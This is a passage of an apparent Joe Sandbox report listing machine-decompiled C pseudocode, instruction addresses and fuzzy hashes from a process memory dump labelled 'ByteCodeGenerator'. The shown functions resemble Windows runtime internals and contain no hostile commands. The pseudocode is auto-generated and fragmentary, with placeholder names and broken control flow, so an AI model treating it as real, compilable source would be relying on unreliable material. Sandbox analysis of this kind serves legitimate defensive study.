                                  				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                  					_t62 = 3;
                                  					asm("int 0x29");
                                  					_push(_t62);
                                  					_push(_t57);
                                  					_push(_t73);
                                  					_push(_t70);
                                  					_t71 = _t62;
                                  					_t74 = 0;
                                  					_v36 = 0;
                                  					_t63 = E0345A2F0(_t62, _t71, 1, 6,  &_v36);
                                  					if(_t63 == 0) {
                                  						L20:
                                  						_t44 = 0x57;
                                  						return _t44;
                                  					}
                                  					_t45 = _v12;
                                  					_t58 = 0x1c;
                                  					if(_t45 < _t58) {
                                  						goto L20;
                                  					}
                                  					_t69 = _t45 / _t58;
                                  					if(_t69 == 0) {
                                  						L19:
                                  						return 0xe8;
                                  					}
                                  					_t59 = _v0;
                                  					do {
                                  						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                  							goto L18;
                                  						}
                                  						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                  						 *_t59 = _t49;
                                  						if( *_t49 != 0x53445352) {
                                  							goto L18;
                                  						}
                                  						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                  						return 0;
                                  						L18:
                                  						_t63 = _t63 + 0x1c;
                                  						_t74 = _t74 + 1;
                                  					} while (_t74 < _t69);
                                  					goto L19;
                                  				}
                                  				 *_t73 = _t41;
                                  				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                  				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                  				 *_t70 = _t73;
                                  				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                  				return 0;
                                  			}


























                                  0x034690af
                                  0x034690b8
                                  0x034690bb
                                  0x034690bf
                                  0x034690c2
                                  0x034690c2
                                  0x034690c8
                                  0x034690cb
                                  0x034690cd
                                  0x034a14d7
                                  0x034a14eb
                                  0x034a14eb
                                  0x00000000
                                  0x034a14eb
                                  0x034a14db
                                  0x034a14e6
                                  0x00000000
                                  0x034a14f2
                                  0x034a14e8
                                  0x00000000
                                  0x034a14e8
                                  0x034690d8
                                  0x034690da
                                  0x034690dd
                                  0x034690e5
                                  0x00000000
                                  0x03469139
                                  0x034690fa
                                  0x034690fe
                                  0x03469142
                                  0x00000000
                                  0x03469142
                                  0x03469104
                                  0x03469107
                                  0x0346910b
                                  0x03469110
                                  0x03469118
                                  0x03469147
                                  0x03469148
                                  0x0346914f
                                  0x03469150
                                  0x03469151
                                  0x03469152
                                  0x03469156
                                  0x0346915d
                                  0x03469160
                                  0x03469168
                                  0x0346916c
                                  0x034691bc
                                  0x034691be
                                  0x00000000
                                  0x034691be
                                  0x0346916e
                                  0x03469173
                                  0x03469176
                                  0x00000000
                                  0x00000000
                                  0x0346917c
                                  0x03469180
                                  0x034691b5
                                  0x00000000
                                  0x034691b5
                                  0x03469182
                                  0x03469185
                                  0x03469189
                                  0x00000000
                                  0x00000000
                                  0x0346918e
                                  0x03469190
                                  0x03469198
                                  0x00000000
                                  0x00000000
                                  0x034691a0
                                  0x00000000
                                  0x034691ad
                                  0x034691ad
                                  0x034691b0
                                  0x034691b1
                                  0x00000000
                                  0x03469185
                                  0x0346911a
                                  0x0346911c
                                  0x0346911f
                                  0x03469125
                                  0x03469127
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                  • Instruction ID: 77f63ba1bcb992731b27dfbb9bd719a83fcd53e1902ded29cdff346f0c770a3d
                                  • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                  • Instruction Fuzzy Hash: 66217C75A00704EFEB20DF59C944AAAF7F8EB54710F1488ABE999AF250D370A9408B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 59%
                                  			E03453B7A(void* __ecx) {
                                  				signed int _v8;
                                  				char _v12;
                                  				intOrPtr _v20;
                                  				intOrPtr _t17;
                                  				intOrPtr _t26;
                                  				void* _t35;
                                  				void* _t38;
                                  				void* _t41;
                                  				intOrPtr _t44;
                                  
                                  				_t17 =  *0x35184c4; // 0x0
                                  				_v12 = 1;
                                  				_v8 =  *0x35184c0 * 0x4c;
                                  				_t41 = __ecx;
                                  				_t35 = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x35184c0 * 0x4c);
                                  				if(_t35 == 0) {
                                  					_t44 = 0xc0000017;
                                  				} else {
                                  					_push( &_v8);
                                  					_push(_v8);
                                  					_push(_t35);
                                  					_push(4);
                                  					_push( &_v12);
                                  					_push(0x6b);
                                  					_t44 = E0346AA90();
                                  					_v20 = _t44;
                                  					if(_t44 >= 0) {
                                  						E0346FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x35184c0 * 0xc);
                                  						_t38 = _t35;
                                  						if(_t35 < _v8 + _t35) {
                                  							do {
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                  							} while (_t38 < _v8 + _t35);
                                  							_t44 = _v20;
                                  						}
                                  					}
                                  					_t26 =  *0x35184c4; // 0x0
                                  					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                  				}
                                  				return _t44;
                                  			}












                                  0x03453b89
                                  0x03453b96
                                  0x03453ba1
                                  0x03453bab
                                  0x03453bb5
                                  0x03453bb9
                                  0x03496298
                                  0x03453bbf
                                  0x03453bc2
                                  0x03453bc3
                                  0x03453bc9
                                  0x03453bca
                                  0x03453bcc
                                  0x03453bcd
                                  0x03453bd4
                                  0x03453bd6
                                  0x03453bdb
                                  0x03453bea
                                  0x03453bf7
                                  0x03453bfb
                                  0x03453bff
                                  0x03453c09
                                  0x03453c0a
                                  0x03453c0b
                                  0x03453c0f
                                  0x03453c14
                                  0x03453c18
                                  0x03453c18
                                  0x03453bfb
                                  0x03453c1b
                                  0x03453c30
                                  0x03453c30
                                  0x03453c3d

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 710aeb6fd272fc7baab113b32f77bf349d75c304c15fa67f78420a0fa79f152a
                                  • Instruction ID: d388cb41fe288fe36b14ebadea916e12d20894115bdde7cb7df164505484073c
                                  • Opcode Fuzzy Hash: 710aeb6fd272fc7baab113b32f77bf349d75c304c15fa67f78420a0fa79f152a
                                  • Instruction Fuzzy Hash: 9921B072A00204AFD711DF58CE81F5AB7BDFB40748F15046AE904AF252C771ED069B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E034A6CF0(void* __edx, intOrPtr _a4, short _a8) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v28;
                                  				char _v36;
                                  				char _v52;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed char* _t21;
                                  				void* _t24;
                                  				void* _t36;
                                  				void* _t38;
                                  				void* _t46;
                                  
                                  				_push(_t36);
                                  				_t46 = __edx;
                                  				_v12 = 0;
                                  				_v8 = 0;
                                  				_v20 = 0;
                                  				_v16 = 0;
                                  				if(E03447D50() == 0) {
                                  					_t21 = 0x7ffe0384;
                                  				} else {
                                  					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                  				}
                                  				if( *_t21 != 0) {
                                  					_t21 =  *[fs:0x30];
                                  					if((_t21[0x240] & 0x00000004) != 0) {
                                  						if(E03447D50() == 0) {
                                  							_t21 = 0x7ffe0385;
                                  						} else {
                                  							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                  						}
                                  						if(( *_t21 & 0x00000020) != 0) {
                                  							_t56 = _t46;
                                  							if(_t46 == 0) {
                                  								_t46 = 0x3405c80;
                                  							}
                                  							_push(_t46);
                                  							_push( &_v12);
                                  							_t24 = E0345F6E0(_t36, 0, _t46, _t56);
                                  							_push(_a4);
                                  							_t38 = _t24;
                                  							_push( &_v28);
                                  							_t21 = E0345F6E0(_t38, 0, _t46, _t56);
                                  							if(_t38 != 0) {
                                  								if(_t21 != 0) {
                                  									E034A7016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                  									L03442400( &_v52);
                                  								}
                                  								_t21 = L03442400( &_v28);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t21;
                                  			}



















                                  0x034a6cfb
                                  0x034a6d00
                                  0x034a6d02
                                  0x034a6d06
                                  0x034a6d0a
                                  0x034a6d0e
                                  0x034a6d19
                                  0x034a6d2b
                                  0x034a6d1b
                                  0x034a6d24
                                  0x034a6d24
                                  0x034a6d33
                                  0x034a6d39
                                  0x034a6d46
                                  0x034a6d4f
                                  0x034a6d61
                                  0x034a6d51
                                  0x034a6d5a
                                  0x034a6d5a
                                  0x034a6d69
                                  0x034a6d6b
                                  0x034a6d6d
                                  0x034a6d6f
                                  0x034a6d6f
                                  0x034a6d74
                                  0x034a6d79
                                  0x034a6d7a
                                  0x034a6d7f
                                  0x034a6d82
                                  0x034a6d88
                                  0x034a6d89
                                  0x034a6d90
                                  0x034a6d94
                                  0x034a6da7
                                  0x034a6db1
                                  0x034a6db1
                                  0x034a6dbb
                                  0x034a6dbb
                                  0x034a6d90
                                  0x034a6d69
                                  0x034a6d46
                                  0x034a6dc6

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8652555e942c159e04b6c9638ea47248f7765b9d6b15a898915ed11461cca169
                                  • Instruction ID: 001bbaa2e1b9bbbba9ff7f1c7191ef23eba82b50aac5eaf996ba378e84afa13e
                                  • Opcode Fuzzy Hash: 8652555e942c159e04b6c9638ea47248f7765b9d6b15a898915ed11461cca169
                                  • Instruction Fuzzy Hash: 3F21D372504B449FD311DF2DC944B6BBBECEF91680F0D086BB9509F261D738C509C6AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E034F070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                  				char _v8;
                                  				intOrPtr _v11;
                                  				signed int _v12;
                                  				intOrPtr _v15;
                                  				signed int _v16;
                                  				intOrPtr _v28;
                                  				void* __ebx;
                                  				char* _t32;
                                  				signed int* _t38;
                                  				signed int _t60;
                                  
                                  				_t38 = __ecx;
                                  				_v16 = __edx;
                                  				_t60 = E034F07DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                  				if(_t60 != 0) {
                                  					_t7 = _t38 + 0x38; // 0x29cd5903
                                  					_push( *_t7);
                                  					_t9 = _t38 + 0x34; // 0x6adeeb00
                                  					_push( *_t9);
                                  					_v12 = _a8 << 0xc;
                                  					_t11 = _t38 + 4; // 0x5de58b5b
                                  					_push(0x4000);
                                  					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                  					E034EAFDE( &_v8,  &_v12);
                                  					E034F1293(_t38, _v28, _t60);
                                  					if(E03447D50() == 0) {
                                  						_t32 = 0x7ffe0380;
                                  					} else {
                                  						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  					}
                                  					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                  						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                  						E034E14FB(_t38,  *_t21, _v11, _v15, 0xd);
                                  					}
                                  				}
                                  				return  ~_t60;
                                  			}













                                  0x034f071b
                                  0x034f0724
                                  0x034f0734
                                  0x034f0738
                                  0x034f074b
                                  0x034f074b
                                  0x034f0753
                                  0x034f0753
                                  0x034f0759
                                  0x034f075d
                                  0x034f0774
                                  0x034f0779
                                  0x034f077d
                                  0x034f0789
                                  0x034f0795
                                  0x034f07a7
                                  0x034f0797
                                  0x034f07a0
                                  0x034f07a0
                                  0x034f07af
                                  0x034f07c4
                                  0x034f07cd
                                  0x034f07cd
                                  0x034f07af
                                  0x034f07dc

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                  • Instruction ID: 2788833dad75526d8694d22a5ea99081514ad6583dfa6e292378a64511367cec
                                  • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                  • Instruction Fuzzy Hash: BB21F23A2042009FD715DF18C880B6ABBE5EFC4350F08856EFA959F392D730D909CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E034A7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _t21;
                                  				void* _t24;
                                  				intOrPtr _t25;
                                  				void* _t36;
                                  				short _t39;
                                  				signed char* _t42;
                                  				unsigned int _t46;
                                  				void* _t50;
                                  
                                  				_push(__ecx);
                                  				_push(__ecx);
                                  				_t21 =  *0x3517b9c; // 0x0
                                  				_t46 = _a8;
                                  				_v12 = __edx;
                                  				_v8 = __ecx;
                                  				_t4 = _t46 + 0x2e; // 0x2e
                                  				_t36 = _t4;
                                  				_t24 = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                  				_t50 = _t24;
                                  				if(_t50 != 0) {
                                  					_t25 = _a4;
                                  					if(_t25 == 5) {
                                  						L3:
                                  						_t39 = 0x14b1;
                                  					} else {
                                  						_t39 = 0x14b0;
                                  						if(_t25 == 6) {
                                  							goto L3;
                                  						}
                                  					}
                                  					 *((short*)(_t50 + 6)) = _t39;
                                  					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                  					_t11 = _t50 + 0x2c; // 0x2c
                                  					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                  					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                  					E0346F3E0(_t11, _a12, _t46);
                                  					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                  					if(E03447D50() == 0) {
                                  						_t42 = 0x7ffe0384;
                                  					} else {
                                  						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                  					}
                                  					_push(_t50);
                                  					_t19 = _t36 - 0x20; // 0xe
                                  					_push(0x403);
                                  					_push( *_t42 & 0x000000ff);
                                  					E03469AE0();
                                  					_t24 = L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                  				}
                                  				return _t24;
                                  			}













                                  0x034a7799
                                  0x034a779a
                                  0x034a779b
                                  0x034a77a3
                                  0x034a77ab
                                  0x034a77ae
                                  0x034a77b1
                                  0x034a77b1
                                  0x034a77bf
                                  0x034a77c4
                                  0x034a77c8
                                  0x034a77ce
                                  0x034a77d4
                                  0x034a77e0
                                  0x034a77e0
                                  0x034a77d6
                                  0x034a77d6
                                  0x034a77de
                                  0x00000000
                                  0x00000000
                                  0x034a77de
                                  0x034a77e5
                                  0x034a77f0
                                  0x034a77f3
                                  0x034a77f6
                                  0x034a77fd
                                  0x034a7800
                                  0x034a780c
                                  0x034a7818
                                  0x034a782b
                                  0x034a781a
                                  0x034a7823
                                  0x034a7823
                                  0x034a7830
                                  0x034a7831
                                  0x034a7838
                                  0x034a783d
                                  0x034a783e
                                  0x034a784f
                                  0x034a784f
                                  0x034a785a

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e7e4d6d6c26a679deafba7aabcd508a86e56432dfeab01da51b2e2bf17661324
                                  • Instruction ID: ec96fdbd9ca911dc31a72fa8a018816837bad66ce32a937a78521e7dba0336eb
                                  • Opcode Fuzzy Hash: e7e4d6d6c26a679deafba7aabcd508a86e56432dfeab01da51b2e2bf17661324
                                  • Instruction Fuzzy Hash: CE219F76500A04AFC725DFA9D880E6BBBA9EF48740F14056EE50ACB750D734E900CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E0344AE73(intOrPtr __ecx, void* __edx) {
                                  				intOrPtr _v8;
                                  				void* _t19;
                                  				char* _t22;
                                  				signed char* _t24;
                                  				intOrPtr _t25;
                                  				intOrPtr _t27;
                                  				void* _t31;
                                  				intOrPtr _t36;
                                  				char* _t38;
                                  				signed char* _t42;
                                  
                                  				_push(__ecx);
                                  				_t31 = __edx;
                                  				_v8 = __ecx;
                                  				_t19 = E03447D50();
                                  				_t38 = 0x7ffe0384;
                                  				if(_t19 != 0) {
                                  					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                  				} else {
                                  					_t22 = 0x7ffe0384;
                                  				}
                                  				_t42 = 0x7ffe0385;
                                  				if( *_t22 != 0) {
                                  					if(E03447D50() == 0) {
                                  						_t24 = 0x7ffe0385;
                                  					} else {
                                  						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                  					}
                                  					if(( *_t24 & 0x00000010) != 0) {
                                  						goto L17;
                                  					} else {
                                  						goto L3;
                                  					}
                                  				} else {
                                  					L3:
                                  					_t27 = E03447D50();
                                  					if(_t27 != 0) {
                                  						_t27 =  *[fs:0x30];
                                  						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                  					}
                                  					if( *_t38 != 0) {
                                  						_t27 =  *[fs:0x30];
                                  						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                  							goto L5;
                                  						}
                                  						_t27 = E03447D50();
                                  						if(_t27 != 0) {
                                  							_t27 =  *[fs:0x30];
                                  							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                  						}
                                  						if(( *_t42 & 0x00000020) != 0) {
                                  							L17:
                                  							_t25 = _v8;
                                  							_t36 = 0;
                                  							if(_t25 != 0) {
                                  								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                  							}
                                  							_t27 = E034A7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                  						}
                                  						goto L5;
                                  					} else {
                                  						L5:
                                  						return _t27;
                                  					}
                                  				}
                                  			}













                                  0x0344ae78
                                  0x0344ae7c
                                  0x0344ae7e
                                  0x0344ae81
                                  0x0344ae86
                                  0x0344ae8d
                                  0x03492691
                                  0x0344ae93
                                  0x0344ae93
                                  0x0344ae93
                                  0x0344ae98
                                  0x0344ae9d
                                  0x034926a2
                                  0x034926b4
                                  0x034926a4
                                  0x034926ad
                                  0x034926ad
                                  0x034926b9
                                  0x00000000
                                  0x034926bb
                                  0x00000000
                                  0x034926bb
                                  0x0344aea3
                                  0x0344aea3
                                  0x0344aea3
                                  0x0344aeaa
                                  0x034926c0
                                  0x034926c9
                                  0x034926c9
                                  0x0344aeb3
                                  0x034926d4
                                  0x034926e1
                                  0x00000000
                                  0x00000000
                                  0x034926e7
                                  0x034926ee
                                  0x034926f0
                                  0x034926f9
                                  0x034926f9
                                  0x03492702
                                  0x03492708
                                  0x03492708
                                  0x0349270b
                                  0x0349270f
                                  0x03492711
                                  0x03492711
                                  0x03492725
                                  0x03492725
                                  0x00000000
                                  0x0344aeb9
                                  0x0344aeb9
                                  0x0344aebf
                                  0x0344aebf
                                  0x0344aeb3

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                  • Instruction ID: a6938cbffc5c75e94cacda8ea1bef86544c386c6fc18b45e75dca848c587ecc5
                                  • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                  • Instruction Fuzzy Hash: 3021F271A41684AFFB21DB69C944B267BE8AF44240F1D04F3DD148F7A2D774DC41C698
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E0345FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                  				intOrPtr _v8;
                                  				void* _t19;
                                  				intOrPtr _t29;
                                  				intOrPtr _t32;
                                  				intOrPtr _t35;
                                  				intOrPtr _t37;
                                  				intOrPtr* _t40;
                                  
                                  				_t35 = __edx;
                                  				_push(__ecx);
                                  				_push(__ecx);
                                  				_t37 = 0;
                                  				_v8 = __edx;
                                  				_t29 = __ecx;
                                  				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                  					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                  					L3:
                                  					_t19 = _a4 - 4;
                                  					if(_t19 != 0) {
                                  						if(_t19 != 1) {
                                  							L7:
                                  							return _t37;
                                  						}
                                  						if(_t35 == 0) {
                                  							L11:
                                  							_t37 = 0xc000000d;
                                  							goto L7;
                                  						}
                                  						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                  							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                  							_t35 = _v8;
                                  						}
                                  						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                  						goto L7;
                                  					}
                                  					if(_t29 == 0) {
                                  						goto L11;
                                  					}
                                  					_t32 =  *_t40;
                                  					if(_t32 != 0) {
                                  						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                  						E034376E2( *_t40);
                                  					}
                                  					 *_t40 = _t29;
                                  					goto L7;
                                  				}
                                  				_t40 = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                  				if(_t40 == 0) {
                                  					_t37 = 0xc0000017;
                                  					goto L7;
                                  				}
                                  				_t35 = _v8;
                                  				 *_t40 = 0;
                                  				 *((intOrPtr*)(_t40 + 4)) = 0;
                                  				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                  				goto L3;
                                  			}










                                  0x0345fd9b
                                  0x0345fda0
                                  0x0345fda1
                                  0x0345fdab
                                  0x0345fdad
                                  0x0345fdb0
                                  0x0345fdb8
                                  0x0345fe0f
                                  0x0345fde6
                                  0x0345fde9
                                  0x0345fdec
                                  0x0349c0c0
                                  0x0345fdfe
                                  0x0345fe06
                                  0x0345fe06
                                  0x0349c0c8
                                  0x0345fe2d
                                  0x0345fe2d
                                  0x00000000
                                  0x0345fe2d
                                  0x0349c0d1
                                  0x0349c0e0
                                  0x0349c0e5
                                  0x0349c0e5
                                  0x0349c0e8
                                  0x00000000
                                  0x0349c0e8
                                  0x0345fdf4
                                  0x00000000
                                  0x00000000
                                  0x0345fdf6
                                  0x0345fdfa
                                  0x0345fe1a
                                  0x0345fe1f
                                  0x0345fe1f
                                  0x0345fdfc
                                  0x00000000
                                  0x0345fdfc
                                  0x0345fdcc
                                  0x0345fdd0
                                  0x0345fe26
                                  0x00000000
                                  0x0345fe26
                                  0x0345fdd8
                                  0x0345fddb
                                  0x0345fddd
                                  0x0345fde0
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                  • Instruction ID: 294b577b11c4a949ec76869fc3fa711532a00ecfab6fcd4c888de5bfd026340c
                                  • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                  • Instruction Fuzzy Hash: 9D216A72A40640DFD731CF4AC640A66F7E9EB94A10F29857FE9468FB12D730AC09CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 54%
                                  			E0345B390(void* __ecx, intOrPtr _a4) {
                                  				signed int _v8;
                                  				signed char _t12;
                                  				signed int _t16;
                                  				signed int _t21;
                                  				void* _t28;
                                  				signed int _t30;
                                  				signed int _t36;
                                  				signed int _t41;
                                  
                                  				_push(__ecx);
                                  				_t41 = _a4 + 0xffffffb8;
                                  				E03442280(_t12, 0x3518608);
                                  				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                  				asm("sbb edi, edi");
                                  				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                  				_v8 = _t36;
                                  				asm("lock cmpxchg [ebx], ecx");
                                  				_t30 = 1;
                                  				if(1 != 1) {
                                  					while(1) {
                                  						_t21 = _t30 & 0x00000006;
                                  						_t16 = _t30;
                                  						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                  						asm("lock cmpxchg [edi], esi");
                                  						if(_t16 == _t30) {
                                  							break;
                                  						}
                                  						_t30 = _t16;
                                  					}
                                  					_t36 = _v8;
                                  					if(_t21 == 2) {
                                  						_t16 = E034600C2(0x3518608, 0, _t28);
                                  					}
                                  				}
                                  				if(_t36 != 0) {
                                  					_t16 = L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                  				}
                                  				return _t16;
                                  			}











                                  0x0345b395
                                  0x0345b3a2
                                  0x0345b3a5
                                  0x0345b3aa
                                  0x0345b3b2
                                  0x0345b3ba
                                  0x0345b3bd
                                  0x0345b3c0
                                  0x0345b3c4
                                  0x0345b3c9
                                  0x0349a3e9
                                  0x0349a3ed
                                  0x0349a3f0
                                  0x0349a3ff
                                  0x0349a403
                                  0x0349a409
                                  0x00000000
                                  0x00000000
                                  0x0349a40b
                                  0x0349a40b
                                  0x0349a40f
                                  0x0349a415
                                  0x0349a423
                                  0x0349a423
                                  0x0349a415
                                  0x0345b3d1
                                  0x0345b3e8
                                  0x0345b3e8
                                  0x0345b3d9

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad5dcf15a335fadc28cf8564759c26f79e864dc7f2dc82946354744f5b47eb3a
                                  • Instruction ID: 32f07cacd8fe4b38f33f2c0b475ed524de8d78a8b3d32af9052ea47da35c58de
                                  • Opcode Fuzzy Hash: ad5dcf15a335fadc28cf8564759c26f79e864dc7f2dc82946354744f5b47eb3a
                                  • Instruction Fuzzy Hash: 0711AF377111149FDB29CA159D4052B769AFBD5330B28013FED16DF390C9315C02C2D8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E03429240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _t33;
                                  				intOrPtr _t37;
                                  				intOrPtr _t41;
                                  				intOrPtr* _t46;
                                  				void* _t48;
                                  				intOrPtr _t50;
                                  				intOrPtr* _t60;
                                  				void* _t61;
                                  				intOrPtr _t62;
                                  				intOrPtr _t65;
                                  				void* _t66;
                                  				void* _t68;
                                  
                                  				_push(0xc);
                                  				_push(0x34ff708);
                                  				E0347D08C(__ebx, __edi, __esi);
                                  				_t65 = __ecx;
                                  				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                  				if( *(__ecx + 0x24) != 0) {
                                  					_push( *(__ecx + 0x24));
                                  					E034695D0();
                                  					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                  				}
                                  				L6();
                                  				L6();
                                  				_push( *((intOrPtr*)(_t65 + 0x28)));
                                  				E034695D0();
                                  				_t33 =  *0x35184c4; // 0x0
                                  				L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                  				_t37 =  *0x35184c4; // 0x0
